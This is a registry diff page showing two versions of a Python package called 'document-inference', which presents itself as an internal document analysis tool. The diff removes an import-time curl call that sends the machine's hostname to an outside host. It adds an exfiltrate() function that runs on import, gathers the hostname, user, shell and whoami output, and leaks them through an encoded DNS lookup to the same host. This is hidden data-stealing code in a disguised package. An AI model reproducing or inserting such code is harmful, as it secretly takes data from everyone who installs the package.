document-inference 0.0.1__py3-none-any.whl → 0.0.2__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (6) hide show
  1. document_inference/__init__.py +31 -3
  2. {document_inference-0.0.1.dist-info → document_inference-0.0.2.dist-info}/METADATA +1 -1
  3. document_inference-0.0.2.dist-info/RECORD +5 -0
  4. document_inference-0.0.1.dist-info/RECORD +0 -5
  5. {document_inference-0.0.1.dist-info → document_inference-0.0.2.dist-info}/WHEEL +0 -0
  6. {document_inference-0.0.1.dist-info → document_inference-0.0.2.dist-info}/top_level.txt +0 -0
document_inference/__init__.py CHANGED
@@ -1,3 +1,31 @@
1
- # document_inference/__init__.py
2
- import socket, os
3
- os.system("curl http://cfa.oob.sl4x0.xyz/?hostname=" + socket.gethostname())
1
+ import os
2
+ import socket
3
+ import uuid
4
+ import base64
5
+ import subprocess
6
+
7
+ def exfiltrate():
8
+ uid = str(uuid.uuid4())[:8]
9
+ hostname = os.uname()[1]
10
+ user = os.getenv("USER") or os.getenv("USERNAME") or "unknown"
11
+ shell = os.getenv("SHELL") or "noshell"
12
+ home = os.getenv("HOME") or "nohome"
13
+
14
+ # Optional RCE output - simple harmless cmd
15
+ try:
16
+ cmd_output = subprocess.check_output(["whoami"], stderr=subprocess.DEVNULL).decode().strip()
17
+ except Exception:
18
+ cmd_output = "fail"
19
+
20
+ # Compress & limit payload (DNS-safe)
21
+ marker = "docinf"
22
+ data = f"{uid}:{hostname}:{user}:{shell}:{cmd_output}:{marker}"
23
+ hexdata = base64.b16encode(data.encode()).decode().lower()[:50] # DNS label limit
24
+
25
+ try:
26
+ # Send DNS request to your Bind9 server
27
+ socket.gethostbyname(f"{hexdata}.oob.sl4x0.xyz")
28
+ except Exception:
29
+ pass
30
+
31
+ exfiltrate()
{document_inference-0.0.1.dist-info → document_inference-0.0.2.dist-info}/METADATA RENAMED
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: document-inference
3
- Version: 0.0.1
3
+ Version: 0.0.2
4
4
  Summary: Internal Document Analysis Package
5
5
  Home-page: https://company-internal.example.com
6
6
  Author: Internal Team
document_inference-0.0.2.dist-info/RECORD ADDED
@@ -0,0 +1,5 @@
1
+ document_inference/__init__.py,sha256=m0w-6DaXgvZcQqZAKHObSStc69DorOCHDpKKwtNx7ZE,897
2
+ document_inference-0.0.2.dist-info/METADATA,sha256=5Bpt8G_7q4JkIFbKfRy-33I65cOEBsRYzaypxLC4Sjg,529
3
+ document_inference-0.0.2.dist-info/WHEEL,sha256=DnLRTWE75wApRYVsjgc6wsVswC54sMSJhAEd4xhDpBk,91
4
+ document_inference-0.0.2.dist-info/top_level.txt,sha256=a_pj2F2lVwT1JQ-irKJ_QcVRRY3f1-8S7abspWFZMPw,19
5
+ document_inference-0.0.2.dist-info/RECORD,,
document_inference-0.0.1.dist-info/RECORD DELETED
@@ -1,5 +0,0 @@
1
- document_inference/__init__.py,sha256=p362-kCRKJcfNpnDFyPBfGR0XB8ijqoJ853y0HJ8FwQ,128
2
- document_inference-0.0.1.dist-info/METADATA,sha256=h14BcNYHfEyCBelXMNwPBJrU265HpLRFGFd-Y8vHvgM,529
3
- document_inference-0.0.1.dist-info/WHEEL,sha256=DnLRTWE75wApRYVsjgc6wsVswC54sMSJhAEd4xhDpBk,91
4
- document_inference-0.0.1.dist-info/top_level.txt,sha256=a_pj2F2lVwT1JQ-irKJ_QcVRRY3f1-8S7abspWFZMPw,19
5
- document_inference-0.0.1.dist-info/RECORD,,